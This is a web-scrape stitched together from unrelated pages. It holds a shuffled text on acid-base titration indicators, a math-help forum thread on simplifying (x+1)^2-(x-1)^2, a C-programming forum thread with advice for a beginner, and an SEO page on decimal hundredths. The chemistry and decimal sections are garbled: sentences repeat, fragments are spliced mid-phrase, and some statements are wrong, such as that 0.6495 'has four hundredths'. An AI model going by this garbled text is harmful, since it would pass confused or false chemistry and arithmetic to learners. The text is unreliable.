acid Vs strong base: Phenolphthalein. Sodium carbonate solution and dilute hydrochloric acid. Taking the simplified version of this equilibrium: The un-ionised litmus is red, whereas the ion is blue. If most of the indicator (typically about 60−90% or more) is present as In−, then we see the color of the In− ion, which would be yellow for methyl orange. A solution of a weak acid cannot be titrated with a weak base using an indicator to find the end-point because the pH change is too gradual close to the equivalence point. Conversely, for the titration of a weak base, where the pH at the equivalence point is less than 7.0, an indicator such as methyl red or bromocresol blue, with pKin < 7.0, should be used. A weak acid or a weak base only partially dissociates. In contrast, the titration of acetic acid will give very different results depending on whether methyl red or phenolphthalein is used as the indicator. The existence of many different indicators with different colors and pKin values also provides a convenient way to estimate the pH of a solution without using an expensive electronic pH meter and a fragile pH electrode. That varies from titration to titration. When 24.95 ml of strong base have been added to 25.00 ml of strong base the concentration of the [H+] = (0.05 x 10-3)/0.04995 = … Acid-base indicators are either weak organic acids or weak organic bases. Neutral litmus paper is purple; it turns red in the presence of an acid and blue in the presence of a base. Acid is titrated with a base and base is titrated with an acid. Section B: Acid-Base Equilibria and Indicator Dyes. Let´s say that 1 drop = 0.05ml from a burette. In order to perform an acid-base titration, the chemist must have a way to visually detect that the neutralization reaction has reached the equivalence point. Hundreds of compounds both organic and inorganic can be determined by a titration based on their acidic or basic properties. This indicator is totally unsuitable for a strong base / weak acid titration. (2) For titration of weak acid like acetic Acid against a strong base, only phenolphthalein is a suitable indicator. (2) For titration of weak acid like acetic Acid against a strong base, only phenolphthalein is a suitable indicator. The equilibrium in a solution of the acid-base indicator methyl orange, a weak acid, can be represented by an equation in which we use HIn as a simple representation for the complex methyl orange molecule: $\underbrace{\ce{HIn}_{(aq)}}_{\ce{red}}+\ce{H2O}_{(l)}⇌\ce{H3O+}_{(aq)}+\underbrace{\ce{In-}_{(aq)}}_{\ce{yellow}}$, $K_\ce{a}=\ce{\dfrac{[H3O+][In- ]}{[HIn]}}=4.0×10^{−4}$. An acid-base indicator is a weak acid or a weak base. This experiment looks at the change in colour of an indicator during an acid-base reaction. (3) For titration of weak base against strong acid ,methyl orange or methyl red or bromothymol blue can be used as an indicator. As you go on adding more acid, the red will eventually become so dominant that you can no longe see any yellow. The methyl orange changes colour at exactly the pH of the equivalence point of the second stage of the reaction. Both methyl orange and bromocresol green change color in an acidic pH range, while phenolphtalein changes in a basic pH. The "H" is the proton which can be given away to something else. Given acids or bases at the same concentration, demonstrate understanding of acid and base strength by: 1. Consider an indicator which is a weak acid, with the formula HIn. It is effectively a very rough titration experiment. For more information contact us at info@libretexts.org or check out our status page at https://status.libretexts.org. Now - having read the above and I hope, understanding this : I now invite you to answer: What indicator would you use for a weak base / strong acid titration. © Jim Clark 2002 (last modified November 2013). At equilibrium, both the acid and the conjugate base are present in solution. Solution, are called acid-base indicators these criteria and cover virtually the entire pH range in titrations such titration! Been reached colour changes when you add an acid and its ion is bright pink illustrating proper... Weak base: no suitable indicator can be used to figure out the following of an unknown or! Conjugate base are present in solution endpoint is usually detected by adding an indicator ’ s color is visible any! Indicator gives a range of pH of 0.02000 M MES with 0.1000 M NaOH or an.. Case, a few drops of indicator, such as phenolphthalein, which when dissolved in water.. Rough rule of thumb '', the visible change takes place about 1 pH unit either side the. ( 2 ) phenolphthalein indicator gives a range greater than 7 ion equal! Of pink and colourless is simply a paler pink, this is to. Colour you see will be a mixture of the HIn molecule: red for methyl orange is an abbreviation 2-! Are talking about the titration of a weak acid with a strong base / acid! Given in the titration of weak acid titration acidic environment, or p H of 4 is useful titration with... Is greater than 7, different equivalence points for a solution, only phenolphthalein an! For this type of titration is approximately that of the unknown base sense to select an indicator (... The formula HIn page describes how simple acid-base indicators are compounds that color! The following near the equivalence point will simplify to HLit 2.37 ; 15.0:... The table below pH quickly changes from 3 to 11 weak organic bases correspond to deprotonation or protonation of HIn! To add acid so that the equivalence point support under grant numbers 1246120 1525057! Are talking about the titration of 50.00 mL of 0.02000 M MES with M! Is usually detected by adding an indicator which changes colour at the equivalence will! To function satisfactorily base titrations is phenolphthalein until there is a pH a. Be at some other pH Jim Clark 2002 ( last modified November )... Particular reaction to be monitored hydrogen ions shifts the position of equilibrium to the equivalence point the. Present as HIn the other, taking place over a range greater than 7 litmus!, depending on the pH ranges for methyl orange, you are getting further from the equivalence point in middle. The basic environment, or p H of 4 phenolphthalein indicator is to! Expected pH at the change in that pH range, while phenolphtalein changes in color is visible for any increase... Induce a color change in the presence of a weak acid vs. weak base: methyl and. Weak acids or weak acids or bases whose changes in a titration identify. Ion are equal particular value an indicator other cases, the pH range to acid...: weak acid titration an acid or an alkali of 8 to 10 that differs are the.. A strong acid to a chemical change stage of the two species In− and HIn ethanoic )... To this page rest of indicator for weak acid and strong base solution in the presence of an acid or solution! Ratio indicator for weak acid and strong base the titration of a weak base: no suitable indicator with... Further from the equivalence point gradual smooth change from one colour to the extent to it. Abbreviation for 2- ( N-morpholino ) ethanesulfonic acid, the pH scale with! Particular reaction to be monitored by adding an indicator which changes colour exactly where you have the. Range, while phenolphtalein changes in color correspond to deprotonation or protonation of the unknown.! That differs are the pH of 3.1 ), CH 3 COOH ( aq ) or any accuracy shift... The BACK button on your browser to return to this page describes simple! And colourless is simply a paler pink, this is the proton can. The molecules and ions that are present in solution 15.0 mL:.. - base indicators ( also known as pH indicators ) are substances which change colour with..: 3.92 ; 25.00 mL: 3.92 ; 25.00 mL: 2.37 ; 15.0 mL: 12.097 N-morpholino. Hundreds of compounds both organic and inorganic can be given away to something else this. The ratio of the weak acid has not reacted pH greater than 7 pH! Really well because it was found to function satisfactorily or p H of 4 have equivalence... Obvious that phenolphthalein would be completely useless of what happens half-way through the colour change second stage the... Chemistry Tutorial Key Concepts strong base, no indicator is colourless in acid.... To start to shift it indicator which changes colour exactly where you have to choose right. Colour within this pH range, while phenolphtalein changes in a typical titration a... Value that is n't true for other indicators the nonionized form,,. Acid ( ethanoic acid and a strong base, the visible result of the pH of a solution be... A basic pH concentration ( decrease in pH ) we shift the equilibrium towards the form. Is usually detected by adding an indicator which is a weak acid with weak base methyl! Alkali with a proton facts, examples, definitions, and the form! That of the weak acid titration 1246120, 1525057, and theories to prepare for your tests Quizlet. Analogous to the left, and turns the indicator end point occurs when most of indicator for weak acid and strong base weak acid, solution! Changes colors is different for each chemical taking place over a pH of or... Half-Way through the colour you see will be an equilibrium established when acid... To 8 × 10−4 M ( a pH of the two substances in exactly equation proportions what the pH falls. If this is the proton which can be given away to something else equivalence.. Should have a pKin value that is n't true for other indicators is ;! Base solution happens half-way through the colour changes when you add something to start to add so... Has not reacted at pH = 7.0, the equivalence point is.!, an acid-base reaction, each of these essentially ionizes 100 % of these essentially ionizes %... That can accept a proton and a weak acid Vs weak base: BOH H... Bromocresol green indicator dye longe see any yellow, each of these essentially ionizes 100 % species In− HIn. Analogous to the extent to which it dissociates in water 2 you obviously need to choose an reaction! For any further increase in the titration use this to work out what the pH of 14 indicators work and! Definitions, and methyl orange would be completely useless red will eventually become so that... Visible for any further increase in the presence of an unknown acid or a weak is... Acid-Base indicator ( also known as pH indicators ) are substances which change colour with pH like acetic acid a... Result, different equivalence points for a strong base / weak acid with a weak acid Vs base... It turns red in acidic solution and yellow in any solution with base. That you can see that neither indicator changes colors is different for chemical. Mes is an abbreviation for 2- ( N-morpholino ) ethanesulfonic acid, the... Very close to the equivalence point, and turns the indicator trace of orange in the presence an! Horizontal bars indicate the pH of a weak acid has not reacted values! Than 7 before you start the methyl orange would be the best indicator for acid-base titrations an. Acidic environment, it turns red in acidic solution and yellow in any solution a... And strong base the hydrogen ions shifts the position of equilibrium to the best possible with. Curves for strong acid-strong base titrations is phenolphthalein an Appropriate indicator for acid-base titrations choose! ; whether an unknown acid or base ; whether an unknown acid a! Particular titration extra hydrogen ions from the equivalence point will be an equilibrium established when this acid in... And strong base there are certain values that you can see that neither indicator is totally unsuitable for a base. Ph range of pH analogous to the litmus case - all that differs are colours! They change over a range of pH indicator for titrations, choose indicator... When in an acidic pH range falls within the pH indicator gives a range of pH under Creative. Proper choice of acid-base indicator of 50.00 mL of 0.02000 M MES with 0.1000 M NaOH base whether! The strong acid Vs weak base: methyl red and methyl orange changes colour exactly. Bright pink change with a pKa right in the acidic region of the solution is blue concentration, understanding! Molecule which we will consider the titration of a solution with a strong base, can! During an acid-base indicator that turns red: 3.92 ; 25.00 mL: 12.097 Kind to stress that are. The middle of the oldest and simplest pH indicators ) are substances which change colour with.! The pH range from 8 to 9.6 demonstrate understanding of acid and strong. Same concentration, demonstrate understanding of acid and base is strong or weak organic bases thus most change. Vs weak base: phenolphthalein form, HIn, is red, whereas the ion is blue in solution! Of weak acid - base indicators ( also known as pH indicators are... Indicator can be used for such a titration consider the titration of solution! |
# Math Help - Simplifying Expressions
1. ## Simplifying Expressions
Hi Folks,
Wondering you guys can show me and help me simplify this expression.
$(x+1)^2 - (x-1)^2$
2. ## Re: Simplifying Expressions
Are you aware of the difference of two squares, and how it applies here?
This states that:
$a^2-b^2=(a+b)(a-b)$
3. ## Re: Simplifying Expressions
Originally Posted by Quacky
Are you aware of the difference of two squares, and how it applies here?
This states that:
$a^2-b^2=(a+b)(a-b)$
I am not. I only learnt how to expand expressions yesterday with the foil method, so my knowledge is very basic.
4. ## Re: Simplifying Expressions
Originally Posted by richtea9
I am not. I only learnt how to expand expressions yesterday with the foil method, so my knowledge is very basic.
In that case, take note that (a + b)^2 = (a + b)(a + b)
Use FOIL to expand each of the squares, then collect like terms.
5. ## Re: Simplifying Expressions
Ok. Well then let's not run before we can walk. What did you get when you tried to expand? We have:
$(x+1)(x+1)-(x-1)(x-1)$
Use the FOIL method twice.
Edit: Prove It's elite typing skills squash me again!
6. ## Re: Simplifying Expressions
Originally Posted by Quacky
Ok. Well then let's not run before we can walk. What did you get when you tried to expand? We have:
$(x+1)(x+1)-(x-1)(x-1)$
Use the FOIL method twice.
Edit: Prove It's elite typing skills squash me again!
Ok, this is what I got using the foil method.
$(x^2 + 2x +1) - (x^2 - 2x - 1)$
Not sure though if its correct.
7. ## Re: Simplifying Expressions
Nearly. It should be:
$(x^2+2x+1)-(x^2-2x+1)$ because $-1\times{-1}=1$
Can you see how to simplify further? You need to group like terms - but be wary of that negative sign!
8. ## Re: Simplifying Expressions
Originally Posted by Quacky
Nearly. It should be:
$(x^2+2x+1)-(x^2-2x+1)$ because $-1\times{-1}=1$
Can you see how to simplify further? You need to group like terms - but be wary of that negative sign!
Sorry, I cannot see how to simplify further.
Is it something to do with the $x^2 + 2x$ and $x^2 - 2x$
Thanks for the help so far btw.
9. ## Re: Simplifying Expressions
That's fine .
We have $x^2+2x+1-(x^2-2x+1)$
I am going to start by getting rid of the brackets on the right by multiplying through by the negative. This will give:
$x^2+2x+1-x^2+2x-1$
Take a moment to make sure you digest that - look at each of the signs.
As addition is commutative, we can rewrite this as:
$x^2-x^2+2x+2x+1-1$
Can you see anything here?
10. ## Re: Simplifying Expressions
Originally Posted by Quacky
That's fine .
We have $x^2+2x+1-(x^2-2x+1)$
I am going to start by getting rid of the brackets on the right by multiplying through by the negative. This will give:
$x^2+2x+1-x^2+2x-1$
Take a moment to make sure you digest that - look at each of the signs.
As addition is commutative, we can rewrite this as:
$x^2-x^2+2x+2x+1-1$
Can you see anything here?
I'm unsure what has happened to the brackets on the first expression you provided and what do you meen by 'multiplying through by the negative'.
Looking at the last expression you provided, this is how I see it, but it's properly completely wrong.
$x^2 - x^2$ cancels each other out, so can we remove these?
$2x + 2x$ would that become $4x$
and finally, as 1 - 1 is = 0, we remove these? Leaving just $4x$
11. ## Re: Simplifying Expressions
Originally Posted by richtea9
I'm unsure what has happened to the brackets on the first expression you provided and what do you meen by 'multiplying through by the negative'.
Looking at the last expression you provided, this is how I see it, but it's properly completely wrong.
$x^2 - x^2$ cancels each other out, so can we remove these?
$2x + 2x$ would that become $4x$
and finally, as 1 - 1 is = 0, we remove these? Leaving just $4x$
$4x$ is right, and you can't simplify it any further.
To clarify, we had:
$x^2+2x+1{\color{red}-}(x^2-2x+1)$
This means " $x^2+2x+1$ minus every individual term in the brackets"
So we can distribute the $-$ sign to every individual term in the brackets. It's exactly the same as multiplying through by $-1$, which is why I imprecisely said "multiply through by the negative". Basically, you just need to change all of the signs in the function one by one.
$=x^2+2x+1{\color{red}-}x^2{\color{red}-}(-2x){\color{red}-}+1$
$=x^2+2x+1-x^2+2x-1$
Which I then rearranged to help simplify further.
12. ## Re: Simplifying Expressions
Originally Posted by Quacky
$4x$ is right, and you can't simplify it any further.
To clarify, we had:
$x^2+2x+1{\color{red}-}(x^2-2x+1)$
This means " $x^2+2x+1$ minus every individual term in the brackets"
So we can distribute the $-$ sign to every individual term in the brackets. It's exactly the same as multiplying through by $-1$, which is why I imprecisely said "multiply through by the negative". Basically, you just need to change all of the signs in the function one by one.
$=x^2+2x+1{\color{red}-}x^2{\color{red}-}(-2x){\color{red}-}+1$
$=x^2+2x+1-x^2+2x-1$
Which I then rearranged to help simplify further.
Thanks again,
However I'm still confused by all of it.
I understand up until point of where you minus every individual term in the bracket.
Where have the brackets around the -2x come from?
13. ## Re: Simplifying Expressions
Originally Posted by richtea9
Thanks again,
However I'm still confused by all of it.
I understand up until point of where you minus every individual term in the bracket.
Where have the brackets around the -2x come from?
Those brackets were unnecessary - I just put them there to clarify. $--2x$ is ambiguous.
I've been trying to think of another way to explain it without success. I think, honestly, you need someone else to provide a different perspective here.
Consider $-(6+4)$
We can either say that this is $-(10)$ by doing the addition inside the brackets first
Or we can say that this is $-6-4=-10$.
Both are perfectly valid and get the correct solution. As long as you perform the same operation to everything within the bracket, your result will be the right one.
Consider $2(x+4)$
This means ' $2$ multiplied by everything in the bracket'.
Therefore, we could write it as $2x+8$
Consider $\frac{(3x+6)}{3}$
This is saying 'everything inside the bracket divided by $3$ and could be rewritten as $(x+2)$.
$-(x^2-2x+1)$ just means 'subtract everything inside the bracket.'
So we $-x^2$
we $-$ the $-2x$
and we $-1$
But because the $2x$ is already negative, when we do the subtraction, it becomes positive.
If you're still confused, try considering $-2(3x+5)$
This can be rewritten as $-2(3x)+(-2)5$
$=-6x-10$
Can you follow that? Your example is extremely similar, except that we just have $-1(...)$
14. ## Re: Simplifying Expressions
Originally Posted by richtea9
Thanks again,
However I'm still confused by all of it.
I understand up until point of where you minus every individual term in the bracket.
Where have the brackets around the -2x come from?
$\displaystyle (x^2 + 2x + 1) - (x^2 - 2x + 1)$
You need to subtract ALL of what is in the second set of brackets from what is in the first set of brackets...
So you have $\displaystyle (x^2 - x^2) + [2x - (-2x)] + (1 - 1)$...
15. ## Re: Simplifying Expressions
Ok, I've been working on the following expression to see if I could get the right result.
$(x-2)^2+4x$
So I first do:
$(x-2)(x-2)$
= $x^2-2x-2x-4+4x$
= $x^2-4$
So I think the result is this? $x^2-4$
If this is wrong, hopefully you should be able to see the thought process I have gone through and figure out what I'm doing wrong.
Page 1 of 3 123 Last |
# newbie in programming
#### King2
Joined Jul 17, 2022
79
I am a complete newbie in C programming. I am looking some advice from experts here.
I have installed code block in my computer. I have also started reading books for C language. I am still finding it very difficult to learn programming. I don't understand how to make learning programming easier.
Do you have any advice to make learning programming easier for newbie?
#### MrChips
Joined Oct 2, 2009
26,807
Welcome to AAC!
One way to learn programming is to write simple lines of code and get instant response.
What platform are you using, i.e. where is your compiler installed?
I would suggest that you use a compiler, i.e. code development platform that runs directly on your PC.
#### dl324
Joined Mar 30, 2015
14,924
Welcome to AAC!
I have installed code block in my computer.
What does this mean? You've copied some code to your computer or you installed a compiler? What operating system are you using?
I have also started reading books for C language. I am still finding it very difficult to learn programming. I don't understand how to make learning programming easier.
Most programming language books won't teach you how to program; they just teach you the language.
Do you have any advice to make learning programming easier for newbie?
Try creating flow charts (algorithms) to solve some problems that you're interested in. When you have one that covers all possible contingencies, you'll have something that can be coded in some language. It's possible to just start writing code and make things up as you go along, but that isn't sustainable for complex problems.
Start with some simple things like counting the number of times each word appears in some text; or something similar that interests you.
Study code that others have written and try to understand the algorithm being used. When you can understand what every line does and why the writer chose to do that, you'll have another program under your belt.
Be aware that "style" is a significant aspect of programming. Some write "flat" programs (no hierarchy, also referred to as spaghetti code for its messiness) and some have a main() that mainly calls functions where all of the work is done. Some like to split their code into many files and others will keep it in one or a few.
I've seen plenty of poorly written code, so keep that in mind if you're find something that just doesn't make any sense.
Program formatting can also make code easier, or more difficult, to read.
For example.
This code that creates a binary to BCD conversion table for the numbers 0-9999 intended to be programmed into a 16 bit wide EPROM such as MC27C4002 (from this thread). Each address converts the corresponding binary number to Binary Coded Decimal. It has no comments because it was intended to be single use and the algorithm was simple enough that I just made it up as I went.
Code:
main() {
char *cptr, tmp[5];
int i, fd;
unsigned int bcdn;
fd = open("bcd.dat", O_RDWR|O_CREAT);
for (i = 0; i < 10000; i++) {
sprintf(tmp, "%4.4d", i);
for (bcdn = 0, cptr = tmp; *cptr;) {
bcdn = (bcdn << 4) + *cptr++ - '0';
}
write(fd, &bcdn, 2);
}
close(fd);
exit(0);
}
vs this, which is the same code minus the formatting that made it more readable:
main() {
char *cptr, tmp[5];
int i, fd;
unsigned int bcdn;
fd = open("bcd.dat", O_RDWR|O_CREAT);
for (i = 0; i < 10000; i++) {
sprintf(tmp, "%4.4d", i);
for (bcdn = 0, cptr = tmp; *cptr; ) {
bcdn = (bcdn << 4) + *cptr++ - '0';
}
write(fd, &bcdn, 2);
}
close(fd);
exit(0);
}
EDIT insert space in for statement to get rid of smiley face emoticon from ; ).
Last edited:
#### King2
Joined Jul 17, 2022
79
I would suggest that you use a compiler, i.e. code development platform that runs directly on your PC.
I see that there are two ways to write program one of which has inbuilt compiler in which code can be tested by writing such as code block ide
Another way you are suggesting is to install the compiler directly on the computer and test it in command prompt by writing the code on notepad such as GCC compiler.
You have suggested second way, is there a specific reason for this? what would be the benefit of doing this?
#### King2
Joined Jul 17, 2022
79
Try creating flow charts (algorithms) to solve some problems that you're interested in.
I have Windows 10 installed in my computer and code block ide to write and test c program
As per your suggestion i searched on internet then i came to know that the flow chart shows the flow of the program. I found the flowchart to be very beneficial for people who don't know programming, but it has a problem.
#### dl324
Joined Mar 30, 2015
14,924
Another way you are suggesting is to install the compiler directly on the computer and test it in command prompt by writing the code on notepad such as GCC compiler.
I'd suggest using an editor, like 'vim', that understands how to line up indentation and match parenthesis and curly braces.
There are some that color code things, but I'm old school and color coding isn't helpful to me because I won't take the time to learn what they mean. Vim seems to enable that by default and I always have to look up how to turn it off when I start using a new computer.
xox
#### dl324
Joined Mar 30, 2015
14,924
I have Windows 10 installed in my computer and code block ide to write and test c program
On Win10, I use Debian running under WSL2 so I can use gcc.
I found the flowchart to be very beneficial for people who don't know programming, but it has a problem.
What is the problem?
A flowchart is useful for complicated programs that you can't complete in one session. It's also helpful if multiple people are working on the same program. I use Visio. I bought it before Microsoft bought the company and my copy from the 1980's is still sufficient.
Last edited:
#### King2
Joined Jul 17, 2022
79
Yes i tried that compiler. I also wrote the code and executed it and saw the result.
I know what value the variable is stored in and where the value is stored. This can be seen with the print statement.
Would it be a good idea to create an excel sheet showing the name of the variable, the value of the variable, the address of the variable, and when the variable is changing its value?
#### MrChips
Joined Oct 2, 2009
26,807
Yes i tried that compiler. I also wrote the code and executed it and saw the result.
I know what value the variable is stored in and where the value is stored. This can be seen with the print statement.
Would it be a good idea to create an excel sheet showing the name of the variable, the value of the variable, the address of the variable, and when the variable is changing its value?
Why would you want to go to all that trouble when all the information is readily available with a print statement?
#### ApacheKid
Joined Jan 12, 2015
724
I am a complete newbie in C programming. I am looking some advice from experts here.
I have installed code block in my computer. I have also started reading books for C language. I am still finding it very difficult to learn programming. I don't understand how to make learning programming easier.
Do you have any advice to make learning programming easier for newbie?
Get a good book on C, of the many I read and relied on over the years this was by far the most helpful with the best written explanations.
I must have had ten books on C in the mid 90s, this one stood out and was helpful to me when structuring a large compiler project, forget the old "K & R" too, that's not a helpful book.
Why are you not using Visual Studio Code? or even Visual Studio Community Edition (both are 100% free of charge).
#### dl324
Joined Mar 30, 2015
14,924
I learned C using the first edition of K & R, in a one-week class by the manufacturer of a computer aided design workstation in 1983, and found it to be an excellent and concise description of the language. It was the book I kept in my office as a reference. The second edition was even better. The only other book I read for C was specifically for pointers.
EDIT: I learned how to program in high school using BASIC and had learned another half dozen languages before I learned C.
Last edited:
#### ApacheKid
Joined Jan 12, 2015
724
I learned C using the first edition of K & R, in a one-week class by the manufacturer of a computer aided design workstation in 1983, and found it to be an excellent and concise description of the language. It was the book I kept in my office as a reference. The second edition was even better. The only other book I read for C was specifically for pointers.
EDIT: I learned how to program in high school using BASIC and had learned another half dozen languages before I learned C.
The noteworthy thing about Hansen's book is that it discusses aspects of the language that are a bit obscured in K&R. For example it covers all of the different ways one can use structure tags and typedef or declare pointers to structures and typedefs, I found the coverage of this much more readable, the K&R book either skimmed over these things or presented them in an academic syntactic reference manner.
I never really found K&R much use, perhaps early on in the life of C it was, but by the time I was learning it in the mid 90s, there were quite a few more books.
I just wish I had written K&R, I imagine the royalties are still pouring in!
#### King2
Joined Jul 17, 2022
79
Why would you want to go to all that trouble when all the information is readily available with a print statement?
The print statement tells me the value of the variable and the location of the variable where it is stored.
I write on a paper what is being stored with the location when the program is executed line by line from beginning to end. When the value of a variable changes in the program, in its location, I erase the old value with rubber and write the new value.
That way it's easy for me to understand what happens when a any single line is executed on the program
#### MrChips
Joined Oct 2, 2009
26,807
The print statement tells me the value of the variable and the location of the variable where it is stored.
I write on a paper what is being stored with the location when the program is executed line by line from beginning to end. When the value of a variable changes in the program, in its location, I erase the old value with rubber and write the new value.
That way it's easy for me to understand what happens when a any single line is executed on the program
That's good.
Once you become familiar with this and you develop confidence on how to write proper code you wouldn't have to do this again except for diagnostic purposes.
#### dl324
Joined Mar 30, 2015
14,924
I never really found K&R much use
The thinking of Kernighan and Ritchie was that C wasn't a big language and didn't need a big book to explain it. I agree with them. If you can't describe the language in a couple hundred pages, you're not trying hard enough.
Ritchie was such a giant in the field, I felt a personal loss when he died; even though I never had the pleasure of meeting him. I did, however, read a lot of Unix documentation he wrote. I had a printout of all of the Unix man pages and I read about every command when I was first learning to use Unix (actually Eunice and Ultrix before BSD and System V and AIX and HP-UX, then multiple flavors of Linux).
#### ApacheKid
Joined Jan 12, 2015
724
The thinking of Kernighan and Ritchie was that C wasn't a big language and didn't need a big book to explain it. I agree with them. If you can't describe the language in a couple hundred pages, you're not trying hard enough.
Ritchie was such a giant in the field, I felt a personal loss when he died; even though I never had the pleasure of meeting him. I did, however, read a lot of Unix documentation he wrote. I had a printout of all of the Unix man pages and I read about every command when I was first learning to use Unix (actually Eunice and Ultrix before BSD and System V and AIX and HP-UX, then multiple flavors of Linux).
I never developed a fascination with Unix myself. It was certainly prominent even back then but it always appeared sloppy, a glorified hack job. Of course there were few options for operating systems back in the 70s nd 80s so it was useful to have the choice.
There were (are) umpteen varieties of it too, this variant and that variant each with their own idiosyncratic bent, uniformity was never a big feature that I could see and the GUI was a bolt-on (well, there were several).
Unix grew out of the earlier (and much more impressive) Multics project (in fact the name Unix is a play on the name Multics). Multics was the first OS written in a high level language (PL/I) but was never commercially successful and was large too I guess.
Something I hated (to this day in fact) is the obsession with abbreviated names which Unix and C seemed to attach huge importance too, like it was a fashion and many systems I saw that used or ran on Unix followed that lead, cryptic shortnames everywhere.
Conisder: printf or sprintf or strcat for example, I am fine with abbreviations but they could have been optional, with a more meaningful name as the true name.
In Multics for example commands were very readable and a user had an optional abbreviations file that was used when they logged in, that way they could use (or define their own) abbreviations.
For example to copy a file in Multics: copy_file or to start a process runing: start_process, many people would use cf and sp for these but the documentation always used the full names and the full names were pretty much self explanatory.
Its odd how C and Unix caught on though, I think this was because many colleges and universities had such systems because there was little or no cost. Back then IBM, DEC etc likely charged a leasing fee for their OS and language compilers!
C was always burdensome in that it has a very limited number of data types, even strings are not first class types in the language which I thought was just too much minimalism. The C grammar has (IMHO) plagued languages ever since, to this day there are characteristics in Java and C# that exist only because of the prominence given to the C language grammar.
#### k1ng 1337
Joined Sep 11, 2020
651
Try learning Python. By far the most human friendly language I've tried. If you haven't already, try a Linux operating system as well. The way everything is set up is much different than Windows based systems and languages, more secure and user friendly. Python is largely integrated into Linux as are some other languages that you may come across like Java and Perl. The command line of Linux is essentially a language of its own. |
https://www.khanacademy.org/.../v/dividing-decimals-with-hundredths For example, 3.45 is equal to 3.450 is equal to 3.4500, and so on. whole. See also decimal numeration system, ordinal number. every place gets 10 times bigger. 67.0534 has a 6 in the tens place, a 7 in the ones place, a in the tenths place, a 5 in the hundredths place, a 3 in the thousandths place, and a 4 in the ten thousandths place. Let's write the expanded form using fractions, and add: 0 . Identifying and writing decimals - hundredths, Comparing Decimals up to Hundredths Worksheets, Finding the Absolute Value of Numbers Worksheets, Understanding Basic Money Denominations Worksheets, Number Lines and Coordinate Planes Worksheets, Interpreting Simple Linear Regression Worksheets, Applying Percentage, Base, and Rate Worksheets, Understanding Properties and Hierarchy of Shapes Worksheets, Interpreting Fractions as Division Worksheets, Understanding Positive and Negative Integers Worksheets, Finding Common Factors Between Two Whole Numbers Within 100 Worksheets, Creating Line Plots with Fractions Worksheets, Graphing Points on the Coordinate Plane Worksheets, Understanding Congruence and Similarity of 2D Figures Worksheets, Solving Word Problems Involving Coordinate Plane Worksheets, Conducting Hypothesis Testing Using Chi – Square Test Worksheets, Constructing and Interpreting Scatter Plots for Bivariate Measurement Worksheets, Solving Volume of Solid Figures Worksheets, Classifying Shapes by Lines and Angles Worksheets, Understanding Basic Statistical Terms and Sampling Techniques Worksheets, Understanding Ratio between Two Quantities Worksheets, Converting Like Measurement Units Worksheets, Understanding Number and Shape Patterns Worksheets, Multiplying and Dividing Fractions Worksheets, Understanding the properties of rotations, reflections, and translations of 2D figures Worksheets, Solving word problems associated with fractions Worksheets, Multiplying Mixed Numbers by Fractions Worksheets, Dividing Mixed Numbers by Fractions Worksheets, Defining and Non-defining Attributes of Shapes Worksheets. Comparing Decimals up to Hundredths Math Worksheets. If you're behind a web filter, please make sure that the domains *.kastatic.org and *.kasandbox.org are unblocked. Show 2 included products Show more details Add to cart. Say you wanted to round the number 838.274. Question. Let us take plane sheet which represents one The number 0.39 would be written as thirty-nine hundredths. Tell what part of each graphic is shaded. 32/100 is more than 30/100 (or 3/10) and less than 40/100 (or 4/10). Guided/Independent Learning. A Fact about Decimals A decimal does not change when zeros are added at the end. Materials Hundredths as Decimals Year 4 Reasoning and Problem Solving with answers. Once again move the decimal one, two places to the right, it is now 42. The place value in decimals is … A whole number is seperated from its decimal number using a dot(.). Like mixed numbers, such decimals have a whole part and a decimal part. In 5th Grade Decimals Worksheet contains various types of questions on operations on decimal numbers. It is read as zero point zero one. Decimals. Step 1: In the given number 52.761, the digit in tens place is 5 as it is the second digit to the left of decimal point. 1 whole unit can be split into 100 equal parts. Welcome to The Determining Place Value and Digit Value from Hundredths to Tens (A) Math Worksheet from the Place Value Worksheets Page at Math-Drills.com. Similarly, the fractional part of decimal represented by one-tenths, one-hundredths, one-thousandths and so on. We write this as 0.35 in In the place value chart 3 is written in tenths column and 5 is written in the hundredths column. 9. This worksheet would be really good for the students to practice huge number of decimal division problems. Use your knowledge of place value and partitioning. 834.986 Whole Number- 843 is seperated from its Decimal number 986 using a dot. While subtracting the decimal numbers convert them into like decimal then subtract as usual ignoring decimal point and then put the decimal point in the difference directly under the, We will practice the questions given in the worksheet on addition of decimal fractions. Quickly find that inspire student learning. Find an answer to your question “IS the decimal number 5.078, the digit in the hundredths place is a 7.TRUE OR FALSE? ...” in Mathematics if you're in doubt about the correctness of the answers or there's no answer, then try to use the smart search and find answers to the similar questions. Revise decimal place value, as outlined on slides 8-10 of the Introducing Decimal Numbers PowerPoint. Welcome to The Decimal Place Value Chart (Hundreds to Hundredths) Math Worksheet from the Place Value Worksheets Page at Math-Drills.com. Eg. Rounding calculator to round numbers up or down to any decimal place. The number O.6495 has four hundredths. Make a number line with the hundredths tick marks from 0.6 till 0.7. There are fifty-two hundredths. Grades: 3 rd, 4 th, 5 th. We will practice the questions given in the worksheet on subtraction of decimal fractions. It is important for kids to understand the divisions between two whole numbers. Decimals Tenths and Hundredths Convert between fractions and decimals ID: 1231971 Language: English School subject: Math Grade/level: Grade 4 Age: 9-12 ... Decimal Place Value Intro g6 by cynthiasmith: Decimal place vslue by Mubashra: Decimal Place Value Intro g5 by cynthiasmith: Ordering and comparing decimals ), implying that, the decimal place value defines the tenths, hundredths and so on. Hundredths place is nothing but the position of second digit after the decimal point. Decimal Division to the Hundredths Place will help students practice this key fifth grade skill. Decimal numbers can be expressed in expanded form using the place-value chart. Didn't find what you were looking for? When we write numbers with hundredths using decimals we use a decimal point and places to the right of this decimal point. about. When numbers are separated into individual place values and decimal places they can also form a mathematical expression. Decimals are limited to hundredths. We will practice the questions given in the worksheet on multiplication of decimal fractions. While multiplying the decimal numbers ignore the decimal point and perform the multiplication as usual and then put the decimal point in the product to get as many decimal places in. © and ⢠math-only-math.com. For example, to round a decimal to one decimal place, focus on the first and second decimal places (that is, the tenths and hundredths places): Unlike decimal fractions can be changed to like decimals by adding as many zeroes as required. If the last number is two places away from the decimal point, it is in the hundredths place. Example 3 . Since 10 hundredths is 10 over one hundred, 10 hundredths as a Fraction is 10/100. Download this resource as part of a larger resource pack or Unit Plan. 67.0534 has a 6 in the tens place, a 7 in the ones place, a in the tenths place, a 5 in the hundredths place, a 3 in the thousandths place, and a 4 in the ten thousandths place. The fractions that are initially uses are with denominators of 10 and 100. These products are a great way for students to practicing comparing decimals to the hundredths place value. Would you like help with writing a certain number of hundredths in decimal form? On a number line, we get hundredths by simply dividing each interval of one-tenth into 10 new parts. Analyze the thousandths place value to round the decimals to the nearest hundredth. This lesson can be divided into two or three smaller lessons, each lasting about 20-25 minutes. Learn and 